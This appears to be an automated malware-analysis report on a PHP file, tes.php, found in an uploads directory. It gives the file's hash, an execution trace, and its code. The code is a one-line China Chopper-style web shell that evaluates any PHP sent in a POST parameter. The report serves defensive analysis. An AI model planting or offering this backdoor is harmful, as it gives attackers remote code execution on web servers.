PHP Malware Analysis

tes.php

md5: cf4d6eaf0ac07e3e15da05becd0a7167

Jump to:

Screenshot


Attributes

Execution

Input


Deobfuscated PHP code

<?php

@eval($_POST['chopper']);

Execution traces

data/traces/cf4d6eaf0ac07e3e15da05becd0a7167_trace-1676258486.1572.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:21:52.055032]
1	0	1	0.000246	393512
1	3	0	0.000293	393864	{main}	1		/var/www/html/uploads/tes.php	0	0
1	3	1	0.000317	393896
			0.000350	314256
TRACE END   [2023-02-13 01:21:52.055176]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php @eval($_POST['chopper']);?>